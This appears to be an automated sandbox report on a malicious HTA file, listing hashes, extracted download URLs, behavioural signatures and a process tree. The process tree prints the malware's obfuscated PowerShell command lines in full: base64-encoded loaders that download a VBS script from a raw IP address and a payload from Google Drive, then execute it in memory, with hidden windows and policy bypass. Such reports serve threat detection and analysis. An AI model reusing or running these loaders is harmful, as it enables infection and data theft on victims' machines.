Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 10:30
Static task
static1
Behavioral task
behavioral1
Sample
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
Resource
win10v2004-20241007-en
General
-
Target
greatevenevermadeforrgreatthignstogetinbacketothegreat.hta
-
Size
131KB
-
MD5
b39c3f8b9214a7a097b0e0c92d6bc193
-
SHA1
7b253873758021db1fa779229091683bc3b7288c
-
SHA256
c1a88da841596f0f34b25bd9c04a36a2d8134bf9955b46f2185c331182d3b8eb
-
SHA512
ea17056a19ae47f4317aad55a971015d48e4e986c6c1bfa0490afdea1045fc4655a6a049ebc0a89ce0fd92029c8dd9cfe973c2c7608c54b79e626657baaa90b7
-
SSDEEP
48:4vah3d7Ah23jX+Iw81OcNw811aoWeGOyMs1n0J6OpyMmRzAbNxx6TVzok1uHlhiA:4vCt73RjkajCjOQVmPizsNqZ1EjIQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 21 IoCs
flow pid Process 23 3336 poWErshElL.exe 31 3788 powershell.exe 34 3788 powershell.exe 49 3788 powershell.exe 59 1552 mshta.exe 67 1552 mshta.exe 69 1552 mshta.exe 70 1552 mshta.exe 71 1552 mshta.exe 83 1552 mshta.exe 85 1552 mshta.exe 87 1552 mshta.exe 88 1552 mshta.exe 89 1552 mshta.exe 90 1552 mshta.exe 92 1552 mshta.exe 94 1552 mshta.exe 95 1552 mshta.exe 96 1552 mshta.exe 97 1552 mshta.exe 99 1552 mshta.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4356 powershell.exe 3788 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3336 poWErshElL.exe 2148 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 31 drive.google.com 30 drive.google.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3788 set thread context of 4912 3788 powershell.exe 112 PID 4912 set thread context of 1552 4912 aspnet_regbrowsers.exe 83 PID 4912 set thread context of 1648 4912 aspnet_regbrowsers.exe 114 PID 1648 set thread context of 1552 1648 setupugc.exe 83 PID 1648 set thread context of 3792 1648 setupugc.exe 117 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWErshElL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setupugc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \Registry\User\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 setupugc.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings poWErshElL.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 3336 poWErshElL.exe 3336 poWErshElL.exe 2148 powershell.exe 2148 powershell.exe 4356 powershell.exe 4356 powershell.exe 3788 powershell.exe 3788 powershell.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 4912 aspnet_regbrowsers.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 4912 aspnet_regbrowsers.exe 1552 mshta.exe 1552 mshta.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe 1648 setupugc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3336 poWErshElL.exe Token: SeDebugPrivilege 2148 powershell.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1552 wrote to memory of 3336 1552 mshta.exe 87 PID 1552 wrote to memory of 3336 1552 mshta.exe 87 PID 1552 wrote to memory of 3336 1552 mshta.exe 87 PID 3336 wrote to memory of 2148 3336 poWErshElL.exe 91 PID 3336 wrote to memory of 2148 3336 poWErshElL.exe 91 PID 3336 wrote to memory of 2148 3336 poWErshElL.exe 91 PID 3336 wrote to memory of 3184 3336 poWErshElL.exe 97 PID 3336 wrote to memory of 3184 3336 poWErshElL.exe 97 PID 3336 wrote to memory of 3184 3336 poWErshElL.exe 97 PID 3184 wrote to memory of 2512 3184 csc.exe 98 PID 3184 wrote to memory of 2512 3184 csc.exe 98 PID 3184 wrote to memory of 2512 3184 csc.exe 98 PID 3336 wrote to memory of 4288 3336 poWErshElL.exe 103 PID 3336 wrote to memory of 4288 3336 poWErshElL.exe 103 PID 3336 wrote to memory of 4288 3336 poWErshElL.exe 103 PID 4288 wrote to memory of 4356 4288 WScript.exe 104 PID 4288 wrote to memory of 4356 4288 WScript.exe 104 PID 4288 wrote to memory of 4356 4288 WScript.exe 104 PID 4356 wrote to memory of 3788 4356 powershell.exe 106 PID 4356 wrote to memory of 3788 4356 powershell.exe 106 PID 4356 wrote to memory of 3788 4356 powershell.exe 106 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 3788 wrote to memory of 4912 3788 powershell.exe 112 PID 1552 wrote to memory of 1648 1552 mshta.exe 114 PID 1552 wrote to memory of 1648 1552 mshta.exe 114 PID 1552 wrote to memory of 1648 1552 mshta.exe 114 PID 1648 wrote to memory of 3792 1648 setupugc.exe 117 PID 1648 wrote to memory of 3792 1648 setupugc.exe 117
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatevenevermadeforrgreatthignstogetinbacketothegreat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe"C:\Windows\sYstEm32\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe" "poWersheLL.exe -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE ; iEx($(IEX('[sYsteM.TeXt.EnCodInG]'+[cHAr]58+[char]0x3A+'utf8.geTSTring([SySTEM.CoNvert]'+[chaR]0X3a+[CHAR]0X3a+'FrombaSE64sTRING('+[CHAR]34+'JDNQWGFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFUmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhEdXd3YU1ILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicHBCayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmFtV2pmLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUpISGlCdkpzc1gsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIndPY1JwcWtrWW8iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkM1BYYU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly83OS4xNDEuMTY0LjIxNC80NDUvZ3JlZW50aGluZ3N0b2JlZ3JlYXR0aGluZ3Nmb3JlbnRpcmVwdXJwb3NlZm9yZ3JlYXQudElGIiwiJGVuVjpBUFBEQVRBXGdyZWVudGhpbmdzdG9iZWdyZWF0dGhpbmdzZm9yZW50aXJlcHVycG9zZS52YlMiLDAsMCk7c3RBUnQtc0xlZXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVlbnRoaW5nc3RvYmVncmVhdHRoaW5nc2ZvcmVudGlyZXB1cnBvc2UudmJTIg=='+[cHaR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lp03b3g1\lp03b3g1.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF126.tmp" "c:\Users\Admin\AppData\Local\Temp\lp03b3g1\CSC8C4470EB113F40CCB58CD7F19FFF62A.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:2512
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greenthingstobegreatthingsforentirepurpose.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnS0NCaW0nKydhZ2VVcmwgPSBITjVodHRwczovJysnL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0JysnPScrJ2Rvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHMnKydVT3libkgtc0R2VWhCWXd1JysnciBITjU7S0MnKydCd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uJysnTmV0LldlYkNsaWVudDtLQ0JpbWFnZUJ5dGVzID0gS0NCd2ViQ2xpZW50LkRvd25sJysnb2FkRGF0YShLQ0JpbWFnZVVyJysnbCk7S0NCaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoS0NCaW1hZ2VCeXRlcyk7S0NCc3RhcnRGbGFnID0gSE41JysnPDxCQVNFNjRfU1RBUlQ+PkhONTtLQ0JlbmRGbGFnID0gSE41PDxCJysnQVNFNjRfRU5EPj5ITjU7S0NCc3RhcnRJbmRleCA9IEtDQmltYWdlVGV4dC5JbmRleE9mKEtDQnN0YXJ0RmxhZyk7S0NCZW5kSW5kZXggPSBLQ0JpbScrJ2FnZVRleHQuSW5kZXhPZihLQ0JlbmRGbGFnKTtLQ0JzdGFydEluZGV4IC1nZSAwIC1hbmQgJysnS0NCZW5kSW5kZXggLWd0IEtDQnN0YXJ0SW5kZXg7S0NCc3RhcnRJbmRleCArPSBLQ0JzdGFydEZsYWcuTGVuZ3RoO0snKydDQicrJ2Jhc2U2NExlbmd0aCA9IEtDQmVuZEluZGV4IC0gS0NCc3RhcnRJbmRleDtLQ0JiYXNlNjRDb21tYW5kJysnID0gS0NCaW1hZ2VUZXh0LlN1YnN0cmluZyhLQ0JzdGFydEluZGV4LCBLQ0JiYXNlNjRMZW5ndGgpO0tDQmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKEtDQmJhc2U2NENvbW1hbmQuVG8nKydDaGFyQXJyYXkoKSBPcHogRm9yRWFjaCcrJy1PYmplY3QgeyBLQ0JfICcrJ30pWy0xLi4tKEtDQmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07S0NCY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnInKydvbUJhc2U2NFN0cmluZyhLQ0JiYXNlNjRSZXZlJysncnNlZCk7SycrJ0NCbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEtDQmNvJysnbW1hbmRCeXRlcyk7S0NCdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChITjVWQUlITjUpO0tDQnZhaU1ldGhvZC5JbnZva2UoS0NCbnVsbCwgQChITjV0eHQuUkZGUlNSUy81NDQvJysnNDEyLjQ2MS4xNDEuOTcvLzpwdHRoSE41LCBITjVkZXMnKydhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVhc3BuZXRfcmVnYnJvd3NlcnMnKydITjUsIEhONWRlc2F0JysnaXZhZG9ITjUsIEhONWQnKydlc2F0aXZhZG9ITjUsSE4nKyc1ZGVzYXRpdmFkb0hONSxITjVkZXNhdGl2YScrJ2RvSE41LEhOJysnNWQnKydlc2F0aXZhZG8nKydITjUnKycsSE41ZGVzYXRpdmFkb0hONSxITjVkZScrJ3NhdGknKyd2YWRvSE41LEhONTFITjUsSE41ZGVzYXRpdmFkb0hONSkpJysnOycpIC1jckVwbEFjRShbQ0hhUl03MitbQ0hhUl03OCtbQ0hhUl01MyksW0NIYVJdMzkgIC1SRXBMYWNlICAnT3B6JyxbQ0hhUl0xMjQgIC1SRXBMYWNlICAoW0NIYVJdNzUrW0NIYVJdNjcrW0NIYVJdNjYpLFtDSGFSXTM2KXwgJiggJFBzaE9tZVsyMV0rJFBzSG9tRVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('KCBim'+'ageUrl = HN5https:/'+'/drive.google.com/uc?export'+'='+'download&id=1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwu'+'r HN5;KC'+'BwebClient = New-Object System.'+'Net.WebClient;KCBimageBytes = KCBwebClient.Downl'+'oadData(KCBimageUr'+'l);KCBimageText = [System.Text.Encoding]::UTF8.GetString(KCBimageBytes);KCBstartFlag = HN5'+'<<BASE64_START>>HN5;KCBendFlag = HN5<<B'+'ASE64_END>>HN5;KCBstartIndex = KCBimageText.IndexOf(KCBstartFlag);KCBendIndex = KCBim'+'ageText.IndexOf(KCBendFlag);KCBstartIndex -ge 0 -and '+'KCBendIndex -gt KCBstartIndex;KCBstartIndex += KCBstartFlag.Length;K'+'CB'+'base64Length = KCBendIndex - KCBstartIndex;KCBbase64Command'+' = KCBimageText.Substring(KCBstartIndex, KCBbase64Length);KCBbase64Reversed = -join (KCBbase64Command.To'+'CharArray() Opz ForEach'+'-Object { KCB_ '+'})[-1..-(KCBbase64Command.Length)];KCBcommandBytes = [System.Convert]::Fr'+'omBase64String(KCBbase64Reve'+'rsed);K'+'CBloadedAssembly = [System.Reflection.Assembly]::Load(KCBco'+'mmandBytes);KCBvaiMethod = [dnlib.IO.Home].GetMethod(HN5VAIHN5);KCBvaiMethod.Invoke(KCBnull, @(HN5txt.RFFRSRS/544/'+'412.461.141.97//:ptthHN5, HN5des'+'ativadoHN5, HN5desativadoHN5, HN5desativadoHN5, HN5aspnet_regbrowsers'+'HN5, HN5desat'+'ivadoHN5, HN5d'+'esativadoHN5,HN'+'5desativadoHN5,HN5desativa'+'doHN5,HN'+'5d'+'esativado'+'HN5'+',HN5desativadoHN5,HN5de'+'sati'+'vadoHN5,HN51HN5,HN5desativadoHN5))'+';') -crEplAcE([CHaR]72+[CHaR]78+[CHaR]53),[CHaR]39 -REpLace 'Opz',[CHaR]124 -REpLace ([CHaR]75+[CHaR]67+[CHaR]66),[CHaR]36)| &( $PshOme[21]+$PsHomE[34]+'x')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4912
-
-
-
-
-
-
C:\Windows\SysWOW64\setupugc.exe"C:\Windows\SysWOW64\setupugc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:3792
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD5b49c5bff10c474842280045e1534dbe4
SHA10bf5dcef5e3f924e37275d042dc5609c7e1b8f7f
SHA25615de46438a1ee752a1fa35ffd9e37cd90ad9bb3b3f9c1881a8a7a3018b210be3
SHA512f283645bbb7c0a49d22983e94041c0d3989bcf7edf588d35177937aeee09bf9afc361bf4e9ca8194d7f829a9f379d1625d0bed330347fe36d3d31592d1969e9c
-
Filesize
18KB
MD523448c956d2df3e12a2dc446975a0b60
SHA18810e737bebf9c8649f8b734aa3993bd966ce8e6
SHA2567e75484391f6544a4f4890b94c5a46a6acd9bf2755d5e42eb4f3918b5e19af63
SHA512a93b5e09a1e48a6da4ddc65dad7e6eb621cf5624add4b4b7509181a41b87fa5ed004f7afc39ea3c9070d8132d8c260980165814a9284b96ec6b8d5d14fae3e3e
-
Filesize
1KB
MD5e4bb2526d7e7f0df68a511fad95e4578
SHA16ec6884c5b3898e64333ff2092140b746ec1044b
SHA2564722cc2802f8762ac408b4b7b56b4bed051b4712e7e187c100f1723867e1b4c9
SHA5122dc0f3d907450d542342f79af70619a480833b243a3d43c0722ec4a6c5c223cea625d6a77765667e5977c0d0233977d07d3eb6b3c8c5f87d45faff4879f85765
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5185b96fb01c8c321cf623fc6e7f5e589
SHA12af453db9a34331c6c132558c21f12c9666293eb
SHA2567da506cf6115382a5226a267d3b58018b871b7ce0daf93e8f3c809f1418b85e5
SHA512e7713abdd1ea5118aed3673f845c4225da78b40de9dbaeacb9a855f57b92654aa440e9d9ac302e8e56a69d6f38129a5c9181baaa407761eef65b26adf624cf8c
-
Filesize
137KB
MD52aa5b4a9613f66275a8813688d89b143
SHA15298dce042df152dcf126dbdbf987549dd8d49c8
SHA2560fd97f432c3ad570e73d18bcacdf7fabf151ca1f96b72da7f30921f2c3e98df4
SHA5121769a546d97b4cf572378dd8473ac9cedbc96cbb03a6c4dc4d7edf376430fa887e384ef60da77a8f0ff9c0c433ac445acb7f6b963009c2801eb8a3c4df69e6e1
-
Filesize
652B
MD58617372dfe5dbc3d932748802a0d8e83
SHA1d6feef1616555274c898ba3f93732e6f334d5c59
SHA25690cfd109772060496c70eeeddca2c394a6dd9446caef1f9ce8c2b5cf55049515
SHA512e430d740daa2516673b3a270343d19a0782eb311d577f5a67a75af9f6a359c0a2711a3df7a1f0c5eeaa64186d34ea47e0a146b7eda6a2f4cec29764bbb9b1b10
-
Filesize
468B
MD50f7f0249df5e809b57ba67ada7205248
SHA1cfe8697900ca60bedef3185a1220f102feac901b
SHA2565e35059c497df270a251877e527d0ac3d9a5d1c3e4c779cb407a85ae5ee643e2
SHA5125b4fc02976ba89fbd8ba05fb016bd79694e123d1498ae1a783c7831e33c39dbff81a5302db10f45f160ec73b3a4d82ad0dc869626ab49f5f0d95c3d5c4fbee38
-
Filesize
369B
MD56e4d9dea18f29a052689bec000e632f3
SHA17ac228185ed3ee246c24ff153026267c57c54284
SHA2566359a57240d82f69a4c4281fb3d62be3d95273fa0eeb2ce158714dd80b67ca2d
SHA512d173e9463b6c67724a7fe9f9aa6a21049e7ada68a1227c806a51ea5939fdec1803c563c7cf7c04d30abd300ff45ca451f2e623f259d4847c4b641e389973d4f6